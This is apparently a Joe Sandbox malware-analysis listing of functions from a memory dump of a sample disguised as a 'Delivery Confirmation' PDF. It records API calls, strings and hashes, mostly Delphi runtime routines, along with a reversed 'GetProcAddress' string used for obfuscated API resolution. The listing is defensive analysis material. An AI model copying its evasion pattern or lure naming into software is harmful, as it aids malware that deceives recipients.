Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02CDD21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02CDD225

Part of subcall function 02CDD1F0: GetProcAddress.KERNEL32(00000000), ref: 02CDD209

Strings

VarNeg, xrefs: 02CDD249
VarBstrFromCy, xrefs: 02CDD3D5
VarAnd, xrefs: 02CDD2F9
VarBoolFromStr, xrefs: 02CDD3BF
VarOr, xrefs: 02CDD30F
VarCyFromStr, xrefs: 02CDD3A9
VariantChangeTypeEx, xrefs: 02CDD233
VarMod, xrefs: 02CDD2E3
oleaut32.dll, xrefs: 02CDD220
VarCmp, xrefs: 02CDD33B
VarXor, xrefs: 02CDD325
VarNot, xrefs: 02CDD25F
VarAdd, xrefs: 02CDD275
VarMul, xrefs: 02CDD2A1
VarDiv, xrefs: 02CDD2B7
VarI4FromStr, xrefs: 02CDD351
VarR4FromStr, xrefs: 02CDD367
VarIdiv, xrefs: 02CDD2CD
VarDateFromStr, xrefs: 02CDD393
VarSub, xrefs: 02CDD28B
VarR8FromStr, xrefs: 02CDD37D
VarBstrFromDate, xrefs: 02CDD3EB
VarBstrFromBool, xrefs: 02CDD401

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 04d9a9651c2754aa40e5c784e60d7c83d03afb2299cffc802c32d1781ea51b09
Instruction ID: 7ddfb006a5668bae76002b3c8f338777dd4026e04f9b36a67b4981e7b2c8c79b
Opcode Fuzzy Hash: 04d9a9651c2754aa40e5c784e60d7c83d03afb2299cffc802c32d1781ea51b09
Instruction Fuzzy Hash: 0E41E9E7EC42465A9608AB7DFC015277BDAE788720360851BF60ACB745DE30FC519E2E

Function 02CE6E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CE6E66
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CE6E77
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CE6E87
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CE6E97
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CE6EA7
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CE6EB7
GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02CE6EC7

Strings

CoCreateInstanceEx, xrefs: 02CE6E71
CoInitializeEx, xrefs: 02CE6E81
CoReleaseServerProcess, xrefs: 02CE6EA1
CoResumeClassObjects, xrefs: 02CE6EB1
CoAddRefServerProcess, xrefs: 02CE6E91
ole32.dll, xrefs: 02CE6E61
CoSuspendClassObjects, xrefs: 02CE6EC1

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: e45ccde745bce8bb6a8af3fba4e3023074374b9009742bd914db7a1f95b51132
Instruction ID: 8e98df0db0b70358cdbfefa00304e85db47f77710d07059fd8440fb12d45079d
Opcode Fuzzy Hash: e45ccde745bce8bb6a8af3fba4e3023074374b9009742bd914db7a1f95b51132
Instruction Fuzzy Hash: 7FF0C0B4ADD351AEFB407F70FC81A2B375D95206043302A79B70356502DAB598129F59

Function 02CD2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02CD28CE

Strings

Unexpected Memory Leak, xrefs: 02CD28C0
An unexpected memory leak has occurred. , xrefs: 02CD2690
Unknown, xrefs: 02CD278C
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CD2849
String, xrefs: 02CD27A1
, xrefs: 02CD2814
7, xrefs: 02CD26A1
bytes: , xrefs: 02CD275D
The unexpected small block leaks are:, xrefs: 02CD2707

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 586666ed2d08b0a8076de26e9893dfb9a19789324d40c559ebda20ff25c3dcd9
Instruction ID: dcb475e5156da72cb228b4975a834e56a8bdf1e4b9ec8b9440fcd853cc599ae6
Opcode Fuzzy Hash: 586666ed2d08b0a8076de26e9893dfb9a19789324d40c559ebda20ff25c3dcd9
Instruction Fuzzy Hash: EFA1F370A043548BDB21AA2CCC80BD9B7E5EF49310F1440E5EE49AB387DB759AC6CF52

Function 02CD252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02CD28C0
An unexpected memory leak has occurred. , xrefs: 02CD2690
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CD2849
, xrefs: 02CD2814
7, xrefs: 02CD26A1
bytes: , xrefs: 02CD275D
The unexpected small block leaks are:, xrefs: 02CD2707

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 0b79d6bfe406fc7b3e37440c55cc68b4e508dfd43fc54c12c5d2a43a9b79aed1
Instruction ID: a940f1149c2c5a10dd9fd7b8f4176b5ff7c7ef4afda931faec28f4d2f4d9d3dd
Opcode Fuzzy Hash: 0b79d6bfe406fc7b3e37440c55cc68b4e508dfd43fc54c12c5d2a43a9b79aed1
Instruction Fuzzy Hash: 0671D570A042988FDB319A2CCC84BD9BBE5EF49704F1041E5DA49DB283DB758AC6CF52

Function 02CDBD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02CDC013,?,?,00000000,00000000), ref: 02CDBD7E

Part of subcall function 02CDA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A

Strings

AMPM, xrefs: 02CDBF92
:mm, xrefs: 02CDBFB1
m/d/yy, xrefs: 02CDBE4D
AMPM , xrefs: 02CDBFA1
:mm:ss, xrefs: 02CDBFCE
mmmm d, yyyy, xrefs: 02CDBE7A

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 74e23040175c6d228f3f527983e314ee845ad28035186af2f08c57351628781f
Instruction ID: ae909d3e06be57f80f67946b9cdc77bc82a6f7f7570b64cbe5d9506f7d0d9a77
Opcode Fuzzy Hash: 74e23040175c6d228f3f527983e314ee845ad28035186af2f08c57351628781f
Instruction Fuzzy Hash: C3614238B001489BDB05FBA4D89069FB7BB9F88300F91953AA301AB745DA35DE05EB94

Function 02CEAE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEAE40
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02CEAE57
IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEAEEB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02CEAEF7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02CEAF0B

Strings

LoadLibraryExA, xrefs: 02CEAE4D
KernelBase, xrefs: 02CEAE52

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 5c5410d90a752e7b8a9f1e65cab1e5af6612688f64507a8b1a2301048fcdf933
Instruction ID: a5f356cb00c35fcbfca13936ed8618a16904a19b11d1757a576de3c363daef9d
Opcode Fuzzy Hash: 5c5410d90a752e7b8a9f1e65cab1e5af6612688f64507a8b1a2301048fcdf933
Instruction Fuzzy Hash: 393192B2A00305BFDF20EF69CC85F5A77B8AF05324F104114FA56AB280D371E950DBA5

Function 02CD432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?,02D307C8,?,?,02CFD7A8,02CD655D,02CFC30D), ref: 02CD4365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?,02D307C8,?,?,02CFD7A8,02CD655D,02CFC30D), ref: 02CD436B
GetStdHandle.KERNEL32(000000F5,02CD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?,02D307C8), ref: 02CD4380
WriteFile.KERNEL32(00000000,000000F5,02CD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?), ref: 02CD4386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02CD43A4

Strings

Error, xrefs: 02CD4398
Runtime error at 00000000, xrefs: 02CD435E, 02CD439D

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 3250f008afe5a9f95d219d6081b1c65c2030df2b34a34e0860f2bd5b4957dbff
Instruction ID: 1e3d4f78a7188ea30ba33a6c1bb1a51ca1c4b06c58df35717fec12e94cdb6aa3
Opcode Fuzzy Hash: 3250f008afe5a9f95d219d6081b1c65c2030df2b34a34e0860f2bd5b4957dbff
Instruction Fuzzy Hash: 8BF02461AC0340BAFB34B2A4AC46F69235C0B80F14F184A15F33AA81C587F0A4C8EB26

Function 02CDAE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02CDACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CDACE1
Part of subcall function 02CDACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CDAD05
Part of subcall function 02CDACC4: GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CDAD20
Part of subcall function 02CDACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CDADB6

CharToOemA.USER32(?,?), ref: 02CDAE83
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEA0
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEA6
GetStdHandle.KERNEL32(000000F4,02CDAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEBB
WriteFile.KERNEL32(00000000,000000F4,02CDAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEC1
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02CDAEE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02CDAEF9

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 283b644d5c09a599097da78963d396d90ff19ce4cdea77e6ac0ea4af4554e9e5
Instruction ID: 6281f4a64986e5e4f42ab3d74a9b97f64b28ac049825503329b6bc29de631325
Opcode Fuzzy Hash: 283b644d5c09a599097da78963d396d90ff19ce4cdea77e6ac0ea4af4554e9e5
Instruction Fuzzy Hash: 391179B6598204BAD200FBA4EC80F9F77EEAB48700F51092AF354D61E1DA71E944DF62

Function 02CDE514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CDE5AD
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CDE5C9
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02CDE602
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CDE67F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02CDE698
VariantCopy.OLEAUT32(?,00000000), ref: 02CDE6CD

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: fa80110337c44346706958ab9f5b9b89b99dc17a99638f30382c8632e35798e7
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 9B51D776A0062D9BCB62EF58CC80BD9B3BDAF4D310F4045D5E609AB241D730AF859F61

Function 02CD3568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CD358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02CD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CD35BD
RegCloseKey.ADVAPI32(?,02CD35E0,00000000,?,00000004,00000000,02CD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CD35D3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02CD3580
FPUMaskValue, xrefs: 02CD35B4

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: aeb5f22db25f3e1f84c819c3fab1d8308e4c72cdf57a35414ed51f004fe3a6c0
Instruction ID: 5c4c3c1b171900de4751008526282e1d4f3aee4dd634a321bc45424089735131
Opcode Fuzzy Hash: aeb5f22db25f3e1f84c819c3fab1d8308e4c72cdf57a35414ed51f004fe3a6c0
Instruction Fuzzy Hash: 1A01B575A44248BAE711DB909D02BBD77ECE708710F1005A6BB05E7580F6759610DE59

Function 02CE80C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
GetProcAddress.KERNEL32(?,?), ref: 02CE812D

Strings

sserddAcorPteG, xrefs: 02CE80E3
Kernel32, xrefs: 02CE8110

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: ec25660e3807bf3243aa72f0974c8765ff6b752934edff3518f760832bbf4ca0
Instruction ID: f95c1221b4e02000fe6cf1048537e305bcbcbc102848637c133236705bf0bb53
Opcode Fuzzy Hash: ec25660e3807bf3243aa72f0974c8765ff6b752934edff3518f760832bbf4ca0
Instruction Fuzzy Hash: 52016D78A40304AFEF14EFA4DC41E9E77AEEB49710F524864B645E7B50DA30ED11DA24

Function 02CDA9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02CDAA6F,?,?,00000000), ref: 02CDA9F0

Part of subcall function 02CDA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02CDAA6F,?,?,00000000), ref: 02CDAA20
EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02CDAA2B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02CDAA6F,?,?,00000000), ref: 02CDAA49
EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02CDAA54

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: c620abcd813e8df973bae6d67502706dae859221069a79522389e88de50206af
Instruction ID: e1b23f0455de8a3e1a0c97a692e21fefa73043f7e1bb344db546febaf4fcde67
Opcode Fuzzy Hash: c620abcd813e8df973bae6d67502706dae859221069a79522389e88de50206af
Instruction Fuzzy Hash: 560126356806446FF302F7B4DD12B6E735DDB46724FA10660F704A66C0E6749E01DEA4

Function 02CDAA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02CDAC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02CDAAB7

Part of subcall function 02CDA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A

Strings

yyyy, xrefs: 02CDABAD
eeee, xrefs: 02CDABC6
ggg, xrefs: 02CDAB9D

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
